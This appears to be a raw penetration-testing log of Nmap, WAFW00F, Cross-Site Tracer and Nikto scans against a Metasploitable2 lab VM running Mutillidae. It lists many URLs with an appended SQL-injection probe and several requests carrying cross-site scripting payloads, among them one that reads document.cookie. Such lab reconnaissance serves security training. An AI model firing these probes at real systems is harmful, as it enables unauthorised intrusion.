| http://192.168.1.113/mutillidae/././index.php?page=register%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/././index.php?page=pen%2dtest%2dtool%2dlookup%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/././index.php?page=login%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=add%2dto%2dyour%2dblog%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/././index.php?page=user%2dpoll%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=html5%2dstorage%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./?page=add%2dto%2dyour%2dblog%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=change%2dlog%2ehtm%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=capture%2ddata%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=register%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=user%2dinfo%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=view%2dsomeones%2dblog%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=login%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/?page=credits%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=add%2dto%2dyour%2dblog%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?username=anonymous&page=password%2dgenerator%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=show%2dlog%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/?page=show%2dlog%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=set%2dbackground%2dcolor%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/?page=user%2dinfo%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=text%2dfile%2dviewer%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=html5%2dstorage%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=html5%2dstorage%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=credits%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=captured%2ddata%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/?page=source%2dviewer%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=dns%2dlookup%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=site%2dfooter%2dxss%2ddiscussion%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=user%2dinfo%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=documentation%2fvulnerabilities%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=pen%2dtest%2dtool%2dlookup%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=change%2dlog%2ehtm&do=toggle%2dhints%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/?page=view%2dsomeones%2dblog%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=login%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=installation%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=capture%2ddata%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=source%2dviewer%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=framing%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=user%2dpoll%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=documentation%2fhow%2dto%2daccess%2dMutillidae%2dover%2dVirtual%2dBox%2dnetwork%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=captured%2ddata%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=arbitrary%2dfile%2dinclusion%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=change%2dlog%2ehtm&do=toggle%2dsecurity%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=credits%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=secret%2dadministrative%2dpages%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=text%2dfile%2dviewer%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/?page=login%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=browser%2dinfo%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/?page=text%2dfile%2dviewer%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/?page=add%2dto%2dyour%2dblog%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=home%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=change%2dlog%2ehtm%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=capture%2ddata%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=register%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=user%2dinfo%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=view%2dsomeones%2dblog%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=login%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/?page=credits%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=add%2dto%2dyour%2dblog%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?username=anonymous&page=password%2dgenerator%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=show%2dlog%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/?page=show%2dlog%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=set%2dbackground%2dcolor%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/?page=user%2dinfo%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=text%2dfile%2dviewer%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=html5%2dstorage%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=credits%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=captured%2ddata%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=secret%2dadministrative%2dpages%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=dns%2dlookup%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=site%2dfooter%2dxss%2ddiscussion%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=user%2dinfo%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=documentation%2fvulnerabilities%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=pen%2dtest%2dtool%2dlookup%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=installation%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/?page=view%2dsomeones%2dblog%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=login%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=arbitrary%2dfile%2dinclusion%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=capture%2ddata%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=framing%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/?page=source%2dviewer%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=user%2dpoll%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=documentation%2fhow%2dto%2daccess%2dMutillidae%2dover%2dVirtual%2dBox%2dnetwork%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=captured%2ddata%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=credits%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=source%2dviewer%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=text%2dfile%2dviewer%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/?page=login%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=home%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=browser%2dinfo%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/?page=text%2dfile%2dviewer%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/?page=add%2dto%2dyour%2dblog%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=html5%2dstorage%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=installation%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=change%2dlog%2ehtm%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=capture%2ddata%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=register%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=user%2dinfo%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=view%2dsomeones%2dblog%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=login%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/?page=credits%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=add%2dto%2dyour%2dblog%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?username=anonymous&page=password%2dgenerator%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=show%2dlog%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=home%2ephp&do=toggle%2dhints%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=framing%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=set%2dbackground%2dcolor%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/?page=user%2dinfo%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=text%2dfile%2dviewer%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=home%2ephp&do=toggle%2dsecurity%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=html5%2dstorage%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=html5%2dstorage%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=installation%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=credits%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=php%2derrors%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=captured%2ddata%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=usage%2dinstructions%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=dns%2dlookup%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=site%2dfooter%2dxss%2ddiscussion%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=user%2dinfo%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/?page=source%2dviewer%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=pen%2dtest%2dtool%2dlookup%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=documentation%2fvulnerabilities%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/?page=view%2dsomeones%2dblog%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=login%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=change%2dlog%2ehtm%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=capture%2ddata%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=text%2dfile%2dviewer%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=notes%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=user%2dpoll%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=documentation%2fhow%2dto%2daccess%2dMutillidae%2dover%2dVirtual%2dBox%2dnetwork%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=captured%2ddata%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=arbitrary%2dfile%2dinclusion%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=credits%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=source%2dviewer%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=secret%2dadministrative%2dpages%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/?page=login%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/?page=show%2dlog%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=browser%2dinfo%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/?page=text%2dfile%2dviewer%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/?page=add%2dto%2dyour%2dblog%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=home%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=installation%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./?page=login%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/././index.php?page=view%2dsomeones%2dblog%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/././index.php?page=register%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=user%2dinfo%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./?page=credits%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=documentation%2fvulnerabilities%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=login%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/././index.php?page=browser%2dinfo%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/././index.php?username=anonymous&page=password%2dgenerator%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/././index.php?page=user%2dinfo%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/././index.php?page=captured%2ddata%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=text%2dfile%2dviewer%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=home%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=register%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/././index.php?page=text%2dfile%2dviewer%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/././index.php?page=dns%2dlookup%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=documentation%2fhow%2dto%2daccess%2dMutillidae%2dover%2dVirtual%2dBox%2dnetwork%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=captured%2ddata%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=credits%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./?page=view%2dsomeones%2dblog%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=framing%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/././index.php?page=capture%2ddata%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./?page=source%2dviewer%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=secret%2dadministrative%2dpages%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=add%2dto%2dyour%2dblog%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=arbitrary%2dfile%2dinclusion%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=change%2dlog%2ehtm%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=capture%2ddata%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=source%2dviewer%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/././index.php?page=site%2dfooter%2dxss%2ddiscussion%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./?page=user%2dinfo%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./?page=text%2dfile%2dviewer%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/././index.php?page=show%2dlog%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/././index.php?page=html5%2dstorage%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/././index.php?page=user%2dpoll%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./?page=show%2dlog%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/././index.php?page=credits%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=html5%2dstorage%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/././index.php?page=login%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/././index.php?page=pen%2dtest%2dtool%2dlookup%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/././index.php?page=set%2dbackground%2dcolor%2ephp%27%20OR%20sqlspider
|_ http://192.168.1.113/mutillidae/./?page=add%2dto%2dyour%2dblog%2ephp%27%20OR%20sqlspider
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
| http-useragent-tester:
|
| Allowed User Agents:
| Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html)
| libwww
| lwp-trivial
| libcurl-agent/1.0
| PHP/
| Python-urllib/2.5
| GT::WWW
| Snoopy
| MFC_Tear_Sample
| HTTP::Lite
| PHPCrawl
| URI::Fetch
| Zend_Http_Client
| http client
| PECL::HTTP
| Wget/1.13.4 (linux-gnu)
| WWW-Mechanize/1.34
|_
MAC Address: 00:0C:29:0E:B0:99 (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 59.81 seconds
^ ^
_ __ _ ____ _ __ _ _ ____
///7/ /.' \ / __////7/ /,' \ ,' \ / __/
| V V // o // _/ | V V // 0 // 0 // _/
|_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
<
...'
WAFW00F - Web Application Firewall Detection Tool
By Sandro Gauci && Wendel G. Henrique
Checking http://192.168.1.113
Generic Detection results:
No WAF detected by the generic detection
Number of requests: 13
http://192.168.1.113 [200] Apache[2.2.8], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.2.8 (Ubuntu) DAV/2], IP[192.168.1.113], PHP[5.2.4-2ubuntu5.10], Title[Metasploitable2 - Linux], WebDAV[2], X-Powered-By[PHP/5.2.4-2ubuntu5.10]
__ ______ _____
\ \/ / ___|_ _|
\ /\___ \ | |
/ \ ___) || |
/_/\_|____/ |_|
+ -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
+ -- --=[Target: 192.168.1.113:80
+ -- --=[Site vulnerable to Cross-Site Tracing!
+ -- --=[Site is vulnerable to host header injection!
+ -- --=[Site vulnerable to Cross-Frame Scripting!
+ -- --=[Site vulnerable to Clickjacking!
HTTP/1.1 200 OK
Date: Sat, 05 Sep 2015 12:35:21 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2
Transfer-Encoding: chunked
Content-Type: message/http
4b
TRACE / HTTP/1.1
Test: <script>alert(1);</script>
Host: 192.168.1.113
0
HTTP/1.1 200 OK
Date: Sat, 05 Sep 2015 12:35:21 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 891
Content-Type: text/html
<html><head><title>Metasploitable2 - Linux</title></head><body>
<pre>
_ _ _ _ _ _ ____
_ __ ___ ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |
| | | | | | __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | | __// __/
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|
|_|
Warning: Never expose this VM to an untrusted network!
Contact: msfdev[at]metasploit.com
Login with msfadmin/msfadmin to get started
</pre>
<ul>
<li><a href="/twiki/">TWiki</a></li>
<li><a href="/phpMyAdmin/">phpMyAdmin</a></li>
<li><a href="/mutillidae/">Mutillidae</a></li>
<li><a href="/dvwa/">DVWA</a></li>
<li><a href="/da
+ -- --=[Checking if X-Content options are enabled on 192.168.1.113...
+ -- --=[Checking if X-Frame options are enabled on 192.168.1.113...
+ -- --=[Checking if X-XSS-Protection header is enabled on 192.168.1.113...
+ -- --=[Checking HTTP methods on 192.168.1.113...
+ -- --=[Checking if TRACE method is enabled on 192.168.1.113...
+ -- --=[Checking for open proxy on 192.168.1.113...
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /.testing/openproxy.txt was not found on this server.</p>
<hr>
<address>Apache/2.2.8 (Ubuntu) DAV/2 Server at crowdshield.com Port 80</address>
</body></html>
+ -- --=[Enumerating software on 192.168.1.113...
Server: Apache/2.2.8 (Ubuntu) DAV/2
X-Powered-By: PHP/5.2.4-2ubuntu5.10
+ -- --=[Checking if Strict-Transport-Security is enabled on 192.168.1.113...
+ -- --=[Checking for Flash cross-domain policy on 192.168.1.113...
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /crossdomain.xml was not found on this server.</p>
<hr>
<address>Apache/2.2.8 (Ubuntu) DAV/2 Server at 192.168.1.113 Port 80</address>
</body></html>
+ -- --=[Checking for Silverlight cross-domain policy on 192.168.1.113...
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /clientaccesspolicy.xml was not found on this server.</p>
<hr>
<address>Apache/2.2.8 (Ubuntu) DAV/2 Server at 192.168.1.113 Port 80</address>
</body></html>
+ -- --=[Checking for HTML5 cross-origin resource sharing on 192.168.1.113...
+ -- --=[Retrieving robots.txt on 192.168.1.113...
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /robots.txt was not found on this server.</p>
<hr>
<address>Apache/2.2.8 (Ubuntu) DAV/2 Server at 192.168.1.113 Port 80</address>
</body></html>
+ -- --=[Retrieving sitemap.xml on 192.168.1.113...
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /sitemap.xml was not found on this server.</p>
<hr>
<address>Apache/2.2.8 (Ubuntu) DAV/2 Server at 192.168.1.113 Port 80</address>
</body></html>
+ -- --=[Checking cookie attributes on 192.168.1.113...
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.113
+ Target Hostname: 192.168.1.113
+ Target Port: 80
+ Start Time: 2015-09-06 17:28:59 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) DAV/2
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.10
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ /phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script>: Output from the phpinfo() function was found.
+ OSVDB-3268: /doc/: Directory indexing found.
+ OSVDB-48: /doc/: The /doc/ directory is browsable. This may be /usr/doc.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpMyAdmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ Server leaks inodes via ETags, header found with file /phpMyAdmin/ChangeLog, inode: 92462, size: 40540, mtime: Tue Dec 9 12:24:00 2008
+ OSVDB-3092: /phpMyAdmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /test/: Directory indexing found.
+ OSVDB-3092: /test/: This might be interesting...
+ /phpinfo.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /phpinfo.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3268: /icons/: Directory indexing found.
+ /phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script>: Output from the phpinfo() function was found.
+ /phpinfo.php?cx[]=5ZvIk85RtqbY8ih16kaP5IycHkpm5dl9dGfHL2FU3O9h50dm6ffZKd8ksDvtgJxvzukqWYtcxQDDnPYhaIUqKlBx56wdKJqwbBdnxGcgIfp41ICCwXMEKPj9H7LCLZQPy7NfcyiwatIaSYGWoQHNnsPWLMInBqYTdpk6QSzP2OIapUF94sNx0B5CbJ2zVyMFIQu0JyzY6UOj6gaiHfbmNnPiMBF1MQnuOz6gZWxnqq5nNC1Ppmj5l7zPQZnQWsxOjBUfZ58YgjyrCuUOmLN1qyO641gP0M8cMX2Wc0MgI1DQTEbUWt64tmY7ruMXKySa3awSPtKqynivwS252szxaipdDyMCfAGcELpRVNJMIuzbw0ZbpPh3BJaVkYYbk4DCWb3bq7sb3hHlUACd2Ei0JPTYXYq6DIsNdF2soIuOQYwRMwBpLVP6h7r2vCxracrXwv24sNcRjcIdKw8eMnID1BBvDL1Ytzbwnjyfmg1H8g6OuCxUngHEslz3Uzkz41y1iJwzw5EPWMOwSggZD1fSSHxglG4iKvwtb1Go6xHnxzFpTz8vl3ZHRN2Z0J0K4Lbjs75vI3hpv2hQniU6RbKG3KkP0LU2EcNUcGZGN4YHiyoxwL7IbjjfyhCivP09JaPAQxbzCiLpFvZd5zmjWNB0qSl3auiSt77631GuW1m9LpA0tmy7FZEYQibZtEw1Ca2S4RCtn2xVsvjCrcVXZw3FrWchH71lLqGqgXOednIDkudbMaS01Db6ghH9AC0K4RhI6xjt9HFgUNiNvszKFpOpRbhVIs17DWlGlnFYqCzFEXLU7Jmig1AD0nwyFBGpbGeCOnj8MyWcYr3ei00S2LR5GQNnJEyzsxqK55qfTy2IdLaBJJIJSeqLugVDxVsr2M9J2G6fEGdxzSvnmrTdXfynqlOW7vIEHBMlaU0bSmEPWUfGEBVeFTUwamUE0C1yfLzVKs78Rd1OUhegwZoTsiVqxrLdHK8X1V8dVeeTpYDwiUcd5ltzUFPID9fda5c2FBhSt8r4DNojb8Id3uQ4GNjY7N2EJOZ2HIDoxGh1iFmUpunK6IDiL3L81VHOZJC7mOvD2fX4Vf0iobJPQHSXHQ9FUKXm4FhYdUEQc1fGqP73DBoyCA8RSmxSvBEW19vHWSijvBtRqBtypq1k5Jy7V05zwmTaw1hf6HTkRo5vg92DdEnUxv33gZV8aVP7yhPkXYi2kyn4Cf07ouf00NYYzEiXOEFXBLgLaqFqTML2GRl